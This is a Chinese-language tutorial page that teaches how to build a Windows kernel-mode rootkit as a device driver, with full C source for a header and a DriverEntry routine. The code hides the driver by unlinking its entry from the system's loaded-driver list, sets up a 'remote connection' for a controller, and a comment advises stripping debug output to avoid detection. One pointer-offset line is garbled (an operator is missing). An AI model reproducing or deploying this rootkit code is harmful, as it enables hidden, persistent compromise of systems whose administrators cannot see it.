Rootkit隱形技術(shù)方法

Rootkit隱形技術(shù)方法

　　一、綜述

　　本文將引領(lǐng)讀者打造一個(gè)初級的內核級Rootkit，然后為其引入兩種簡(jiǎn)單的隱形技術(shù)：進(jìn)程隱形技術(shù)和文件隱形技術(shù)。同時(shí)，為了讓讀者獲得rootkit編程的相關(guān)經(jīng)驗，我們順便介紹了rootkit的裝載、卸載方法，以及必不可少的測試技術(shù)。

　　本文介紹的Rootkit的主要構件是一個(gè)設備驅動(dòng)程序，所以我們首先了解一下我們的第一個(gè)rootkit。

　　二、rootkit主體

　　本節引入一個(gè)簡(jiǎn)單的rootkit實(shí)例，它實(shí)際上只給出了rootkit的主體框架，換句話(huà)說(shuō)，就是一個(gè)設備驅動(dòng)程序。那么為什么要用設備驅動(dòng)程序作為主體呢？很明顯，因為在系統中，設備驅動(dòng)程序和操作系統一樣，都是程序中的特權階級——它們運行于Ring0，有權訪(fǎng)問(wèn)系統中的所有代碼和數據。還有一點(diǎn)需要說(shuō)明的是，因為本例主要目的在于介紹rootkit是如何隱形的，所以并沒(méi)有實(shí)現后門(mén)之類(lèi)的具體功能，。

　　我們將以源代碼的形式說(shuō)明rootkit，對著(zhù)重介紹一些重要的數據結構和函數。下面，先給出我們用到的第一個(gè)文件，它是一個(gè)頭文件，名為Invisible.h，具體如下所示：

　　//Invisible.h：我們r(jià)ootkit的頭文件

　　#ifndef _INVISIBLE_H_

　　#define _INVISIBLE_H_

　　typedef BOOLEAN BOOL;

　　typedef unsigned long DWORD;

　　typedef DWORD* PDWORD;

　　typedef unsigned long ULONG;

　　typedef unsigned short WORD;

　　typedef unsigned char BYTE;

　　typedef struct _DRIVER_DATA

　　{

　　LIST_ENTRY listEntry;

　　DWORD unknown1;

　　DWORD unknown2;

　　DWORD unknown3;

　　DWORD unknown4;

　　DWORD unknown5;

　　DWORD unknown6;

　　DWORD unknown7;

　　UNICODE_STRING path;

　　UNICODE_STRING name;

　　} DRIVER_DATA;

　　#endif

　　我們知道，應用軟件只要簡(jiǎn)單引用幾個(gè)文件如stdio.h和windows.h，就能囊括大量的定義。但這種做法到了驅動(dòng)程序這里就行不通了，原因大致有二條，一是驅動(dòng)程序體積一般較為緊湊，二是驅動(dòng)程序用途較為專(zhuān)一，用到的數據類(lèi)型較少。因此，我們這里給出了一個(gè)頭文件Invisible.h，其中定義了一些供我們的rootkit之用的數據類(lèi)型。

　　這里定義的類(lèi)型中，有一個(gè)數據類(lèi)型要提一下：雙字類(lèi)型，它實(shí)際上是一個(gè)無(wú)符號長(cháng)整型。此外，DRIVER_DATA是Windows 操作系統未公開(kāi)的一個(gè)數據結構，其中含有分別指向設備驅動(dòng)程序目錄中上一個(gè)和下一個(gè)設備驅動(dòng)程序的指針。而我們這里開(kāi)發(fā)的rootkit恰好就是作為設備驅動(dòng)程序來(lái)實(shí)現，所以，只要從設備驅動(dòng)程序目錄中將我們的rootkit（即驅動(dòng)程序）所對應的目錄項去掉，系統管理程序就看不到它了，從而實(shí)現了隱形。

　　上面介紹了rootkit的頭文件，現在開(kāi)始介紹rootkit的主體部分，它實(shí)際就是一個(gè)基本的設備驅動(dòng)程序，具體代碼如下面的Invisible.c所示：

　　// Invisible

　　#include "ntddk.h"

　　#include "Invisible.h"

　　#include "fileManager.h"

　　#include "configManager.h"

　　// 全局變量

　　ULONG majorVersion;

　　ULONG minorVersion;

　　//當進(jìn)行free build時(shí)，將其注釋掉，以防被檢測到

　　VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )

　　{

　　DbgPrint("comint16: OnUnload called.");

　　}

　　NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING

　　theRegistryPath )

　　{

　　DRIVER_DATA* driverData;

　　//取得操作系統的版本

　　PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

　　// Major = 4: Windows NT 4.0, Windows Me, Windows 98 或 Windows 95

　　// Major = 5: Windows Server 2003, Windows XP 或 Windows 2000

　　// Minor = 0: Windows 2000, Windows NT 4.0 或 Windows 95

　　// Minor = 1: Windows XP

　　// Minor = 2: Windows Server 2003

　　if ( majorVersion == 5 && minorVersion == 2 )

　　{

　　DbgPrint("comint16: Running on Windows 2003");

　　}

　　else if ( majorVersion == 5 && minorVersion == 1 )

　　{

　　DbgPrint("comint16: Running on Windows XP");

　　}

　　else if ( majorVersion == 5 && minorVersion == 0 )

　　{

　　DbgPrint("comint16: Running on Windows 2000");

　　}

　　else if ( majorVersion == 4 && minorVersion == 0 )

　　{

　　DbgPrint("comint16: Running on Windows NT 4.0");

　　}

　　else

　　{

　　DbgPrint("comint16: Running on unknown system");

　　}

　　// 隱藏該驅動(dòng)程序

　　driverData = *((DRIVER_DATA**)((DWORD)pDriverObject 20));

　　if( driverData != NULL )

　　{

　　// 將本驅動(dòng)程序的相應目錄項從項驅動(dòng)程序目錄中拆下來(lái)

　　*((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;

　　driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;

　　}

　　// 允許卸載本驅動(dòng)程序

　　pDriverObject->DriverUnload = OnUnload;

　　// 為本Rootkit的控制器配置連接

　　if( !NT_SUCCESS( Configure() ) )

　　{

　　DbgPrint("comint16: Could not configure remote connection.n");

　　return STATUS_UNSUCCESSFUL;

　　}

　　return STATUS_SUCCESS;

　　}

【Rootkit隱形技術(shù)方法】相關(guān)文章：

避免“隱形”面試錯誤的方法07-13

蚯蚓養殖技術(shù)方法09-15

面試方法和技術(shù)07-11

常見(jiàn)的股票技術(shù)分析方法07-01

復合技術(shù)選股方法07-01

設定技術(shù)參數的方法07-01

盤(pán)面異動(dòng)技術(shù)分析方法07-01

股票技術(shù)分析方法詳解07-01

股市板塊技術(shù)分析的方法07-01

迅速提高攝影技術(shù)的方法07-03